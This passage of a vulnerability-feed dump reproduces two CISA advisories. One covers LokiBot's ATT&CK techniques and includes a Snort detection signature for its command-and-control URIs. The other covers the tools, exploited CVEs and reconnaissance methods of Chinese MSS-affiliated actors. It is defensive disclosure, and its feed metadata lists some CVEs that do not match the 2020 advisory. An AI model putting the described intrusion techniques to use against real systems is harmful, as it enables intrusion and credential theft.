[[T1055.012](<https://attack.mitre.org/versions/v7/techniques/T1055/012/>)]\n\n| \n\nLokiBot has used process hollowing to inject into legitimate Windows process vbc.exe. \n \n_Input Capture: Keylogging_ [[T1056.001](<https://attack.mitre.org/versions/v7/techniques/T1056/001>)]\n\n| \n\nLokiBot has the ability to capture input on the compromised host via keylogging. \n \n_Application Layer Protocol: Web Protocols _[[T1071.001](<https://attack.mitre.org/versions/v7/techniques/T1071/001>)]\n\n| \n\nLokiBot has used Hypertext Transfer Protocol for command and control. \n \n_System Information Discovery_ [[T1082](<https://attack.mitre.org/versions/v7/techniques/T1082>)]\n\n| \n\nLokiBot has the ability to discover the computer name and Windows product name/version. \n \n_User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v7/techniques/T1204/002/>)]\n\n| \n\nLokiBot has been executed through malicious documents contained in spearphishing emails. \n \n_Credentials from Password Stores_ [[T1555](<https://attack.mitre.org/versions/v7/techniques/T1555/>)]\n\n| \n\nLokiBot has stolen credentials from multiple applications and data sources including Windows operating system credentials, email clients, File Transfer Protocol, and Secure File Transfer Protocol clients. \n \n_Credentials from Password Stores: Credentials from Web Browsers_ [[T1555.003](<https://attack.mitre.org/versions/v7/techniques/T1555/003>)]\n\n| \n\nLokiBot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and Chromium and Mozilla Firefox-based web browsers. \n \n_Hide Artifacts: Hidden Files and Directories_ [[T1564.001](<https://attack.mitre.org/versions/v7/techniques/T1564/001/>)]\n\n| \n\nLokiBot has the ability to copy itself to a hidden file and directory. \n \n### Detection\n\n#### Signatures\n\nCISA developed the following Snort signature for use in detecting network activity associated with LokiBot activity.\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"Lokibot:HTTP URI POST contains '/*/fre.php' post-infection\"; flow:established,to_server; flowbits:isnotset,.tagged; content:\"/fre.php\"; http_uri; fast_pattern:only; urilen:<50,norm; content:\"POST\"; nocase; http_method; pcre:\"/\\/(?:alien|loky\\d|donep|jemp|lokey|new2|loki|Charles|sev7n|dbwork|scroll\\/NW|wrk|job|five\\d?|donemy|animation\\dkc|love|Masky|v\\d|lifetn|Ben)\\/fre\\\\.php$/iU\"; flowbits:set,.tagged;classtype:http-uri; metadata:service http; metadata:pattern HTTP-P001,)\n\n### Mitigations\n\nCISA and MS-ISAC recommend that federal, state, local, tribal, territorial government, private sector users, and network administrators consider applying the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.\n\n * Maintain up-to-date antivirus signatures and engines. See [Protecting Against Malicious Code](<https://www.us-cert.gov/ncas/tips/ST18-271>).\n * Keep operating system patches up to date. See [Understanding Patches and Software Updates](<https://www.us-cert.gov/ncas/tips/ST04-006>).\n * Disable file and printer sharing services. If these services are required, use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) or Active Directory authentication.\n * Enforce multi-factor authentication. See [Supplementing Passwords ](<https://www.us-cert.gov/ncas/tips/ST05-012>)for more information.\n * Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators\u2019 group unless required.\n * Enforce a strong password policy. See [Choosing and Protecting Passwords](<https://www.us-cert.gov/ncas/tips/ST04-002>).\n * Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>).\n * Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to sites with unfavorable content.\n * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).\n * Scan all software downloaded from the internet prior to executing.\n * Maintain situational awareness of the latest threats and implement appropriate access control lists.\n * Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.\n\nFor additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, [Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>).\n\n### Resources\n\nCenter for Internet Security Security Event Primer \u2013 Malware: <https://www.cisecurity.org/white-papers/security-event-primer-malware/> \nMITRE ATT&CK \u2013 LokiBot: [https://attack.mitre.org/software/S0447/](<https://attack.mitre.org/versions/v7/software/S0447/>) \nMITRE ATT&CK for Enterprise: [https://attack.mitre.org/matrices/enterprise/](<https://attack.mitre.org/versions/v7/matrices/enterprise/>)\n\n### References\n\n[[1] Trend Micro: LokiBot Impersonates Popular Game Launcher and Drops Compiled C# Code File ](<https://blog.trendmicro.com/trendlabs-security-intelligence/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file/>)\n\n[[2] Fortinet: Newly Discovered Infostealer Attack Uses LokiBot ](<https://www.fortinet.com/blog/threat-research/new-infostealer-attack-uses-lokibot#:~:text=The%20FortiGuard%20Labs%20SE%20team%20identified%20a%20new,manufacturing%20company%20utilizing%20the%20well%20documented%20infostealer%20LokiBot.>)\n\n[[3] ZDNet: LokiBot Malware Now Hides its Source Code in Image Files](<https://www.zdnet.com/article/lokibot-information-stealer-now-hides-malware-in-image-files/>)\n\n[[4] SecurityWeek: LokiBot and NanoCore Malware Distributed in ISO Image Files](<https://www.securityweek.com/lokibot-and-nanocore-malware-distributed-iso-image-files>)\n\n[[5] Netskope: LokiBot & NanoCore being distributed via ISO disk image files ](<https://www.netskope.com/blog/lokibot-nanocore-iso-disk-image-files>)\n\n[[6] Trend Micro: Attack Using Windows Installer Leads to LokiBot](<https://www.trendmicro.com/en_us/research/18/b/attack-using-windows-installer-msiexec-exe-leads-lokibot.html>)\n\n[[7] BleepingComputer: LokiBot Android Banking Trojan Turns Into Ransomware When You Try to Remove It](<https://www.bleepingcomputer.com/news/security/lokibot-android-banking-trojan-turns-into-ransomware-when-you-try-to-remove-it/>)\n\n[[8] Fortinet: New Loki Variant Being Spread via PDF File](<https://www.fortinet.com/blog/threat-research/new-loki-variant-being-spread-via-pdf-file>)\n\n[[9] Check Point: Preinstalled Malware Targeting Mobile Users](<https://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/>)\n\n[[10] BleepingComputer: Loki Trojan Infects Android Libraries and System Process to Get Root Privileges](<https://www.bleepingcomputer.com/news/security/loki-trojan-infects-android-libraries-and-system-process-to-get-root-privileges/>)\n\n[[11] New Jersey Cybersecurity & Communications Integration Cell: LokiBot ](<https://www.cyber.nj.gov/threat-center/threat-profiles/android-malware-variants/lokibot>)\n\n### Revisions\n\nSeptember 22, 2020: Initial Version|September 23, 2020: Added hyperlink to MS-ISAC\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "LokiBot Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-10-24T12:00:00", "id": "AA20-266A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-266a", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:31:00", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these\u2014and other threat actors with varying degrees of skill\u2014routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) and Pre-ATT&CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).\n\n### Key Takeaways\n\n * Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.\n * Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.\n * Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.\n * If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.\n * This Advisory identifies some of the more common\u2014yet most effective\u2014TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nThrough the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People\u2019s Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.\n\nAccording to a recent U.S. Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries\u2014including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense\u2014in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]\n\nAccording to the indictment,\n\n_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents\u2019 names and extensions (e.g., from \u201c.rar\u201d to \u201c.jpg\u201d) and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks\u2019 \u201crecycle bins.\u201d The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._\n\nThe continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.\n\n### MITRE PRE-ATT&CK\u00ae Framework for Analysis\n\nIn the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&CK\u00ae Framework TTPs.\n\n#### Target Selection and Technical Information Gathering\n\n_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors\u2019 motivations and intents are often unknown, they often make their selections based on the target network\u2019s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposure (CVE) database, and the National Vulnerabilities Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]\n\n * Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.\n * The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.\n\nThese information sources have legitimate uses for network defense. CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.\n\nWhile using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.\n\nCISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).\n\n_Table 1: Technical information gathering techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>)\n\n| \n\nDetermine Approach/Attack Vector\n\n| \n\nThe threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. \n \n[T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>)\n\n| \n\nAcquire Open Source Intelligence (OSINT) Data Sets and Information\n\n| \n\nCISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. \n \n[T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>)\n\n| \n\nConduct Active Scanning\n\n| \n\nCISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. \n \n#### Technical Weakness Identification\n\nCISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)]\n\nAdditionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.\n\n_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_\n\nVulnerability\n\n| \n\nObservations \n \n---|--- \n \nCVE-2020-5902: F5 Big-IP Vulnerability\n\n| \n\nCISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. This is a vulnerability in F5\u2019s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a%20>)] \n \nCVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances\n\n| \n\nCISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a%20>)] \n \nCVE-2019-11510: Pulse Secure VPN Servers\n\n| \n\nCISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a%20%20>)] \n \nCVE-2020-0688: Microsoft Exchange Server\n\n| \n\nCISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks. \n \nAdditionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification _[[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]). \n\n_Table 3: Technical weakness identification techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>)\n\n| \n\nAnalyze Architecture and Configuration Posture\n\n| \n\nCISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for known vulnerable network appliance CVE-2019-11510. \n \n[T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>)\n\n| \n\nResearch Relevant Vulnerabilities\n\n| \n\nCISA has observed the threat actors scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs. \n \n#### Build Capabilities \n\nCISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities _[[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.\n\n_Table 4: Build capabilities observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>)\n\n| \n\nC2 Protocol Development\n\n| \n\nCISA observed beaconing from a Federal Government entity to the threat actors\u2019 C2 server. \n \n[T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>)\n\n| \n\nBuy Domain Name\n\n| \n\nCISA has observed the use of domains purchased by the threat actors. \n \n[T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>)\n\n| \n\nAcquire and / or use of 3rd Party Infrastructure\n\n| \n\nCISA has observed the threat actors using virtual private servers to conduct cyber operations. \n \n[T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>)\n\n| \n\nObtain/Re-use Payloads\n\n| \n\nCISA has observed the threat actors use and reuse existing capabilities. \n \n[T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>)\n\n| \n\nBuild or Acquire Exploit\n\n| \n\nCISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. \n \n### MITRE ATT&CK Framework for Analysis\n\nCISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com%20>)][[11](<https://exploit-db.com%20>)] Both repositories are commonly used for legitimate development and penetration testing and developing open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.\n\nDuring incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.\n\n_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_\n\nTool\n\n| \n\nObservations \n \n---|--- \n \n[Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>)\n\n| \n\nCISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. It contains a number of tools that complement the cyber threat actor\u2019s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers. \n \n[China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>)\n\n| \n\nCISA has observed the actors successfully deploying China Chopper against organizations\u2019 networks. This open-source tool can be downloaded from internet software repositories such GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \n \n[Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>)\n\n| \n\nCISA has observed the actors using Mimikatz during their operations. This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/%20>)] \n \nThe following sections list the ATT&CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.\n\n#### Initial Access \n\nIn the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.\n\nCISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.\n\n_Table 6: Initial access techniques observed by CISA_\n\n**MITRE ID**\n\n| \n\n**Name**\n\n| \n\n**Observation** \n \n---|---|--- \n \n[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)\n\n| \n\nUser Execution: Malicious Link\n\n| \n\nCISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent \n \n[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)\n\n| \n\nPhishing: Spearphishing Link\n\n| \n\nCISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. \n \n[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)\n\n| \n\nExploit Public-Facing Application\n\n| \n\nCISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. \n \nCyber threat actors can continue to successfully launch these types of low-complexity attacks\u2014as long as misconfigurations in operational environments and immature patch management programs remain in place\u2014by taking advantage of common vulnerabilities and using readily available exploits and information.\n\n#### Execution \n\nCISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.\n\nCISA has observed Chinese MSS-affiliated actors using the _Execution _[[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.\n\n_Table 7: Execution technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>)\n\n| \n\nSoftware Deployment Tools\n\n| \n\nCISA observed activity from a Federal Government IP address beaconing out to the threat actors\u2019 C2 server, which is usually an indication of compromise. \n \n#### Credential Access \n\nCyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.\n\nCISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.\n\n_Table 8: Credential access techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>)\n\n| \n\nOperating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory\n\n| \n\nCISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. \n \n[T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>)\n\n| \n\nBrute Force: Credential Stuffing\n\n| \n\nCISA observed what was likely a brute-force attack of a Remote Desktop Protocol on a public-facing server. \n \n#### Discovery \n\nAs with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable\u2014there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques. CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).\n\n_Table 9: Discovery technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>)\n\n| \n\nNetwork Service Scanning\n\n| \n\nCISA has observed suspicious network scanning activity for various ports at Federal Government entities. \n \n#### Collection \n\nWithin weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.\n\n_Table 10: Collection technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>)\n\n| \n\nEmail Collection\n\n| \n\nCISA observed the actors targeting CVE-2020-0688 to collect emails from the exchange servers found in Federal Government environments. \n \n#### Command and Control \n\nCISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, \u201cThe Onion Router\u201d (Tor) is often used by cyber threat actors for anonymity and C2. Actor\u2019s carefully choose proxy tools depending on their intended use. These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.\n\nCISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.\n\n_Table 11: Command and control techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)\n\n| \n\nProxy: External Proxy\n\n| \n\nCISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. \n \n[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)\n\n| \n\nProxy: Multi-hop Proxy\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)\n\n| \n\nEncrypted Channel: Asymmetric Cryptography\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n### Mitigations\n\nCISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information.\n\nCISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).\n\n_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_\n\nVulnerability\n\n| \n\nVulnerable Products\n\n| \n\nPatch Information \n \n---|---|--- \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n| \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\n * Citrix Application Delivery Controller\n\n * Citrix Gateway\n\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\n * Microsoft Exchange Servers\n\n| \n\n * [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n \nCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources 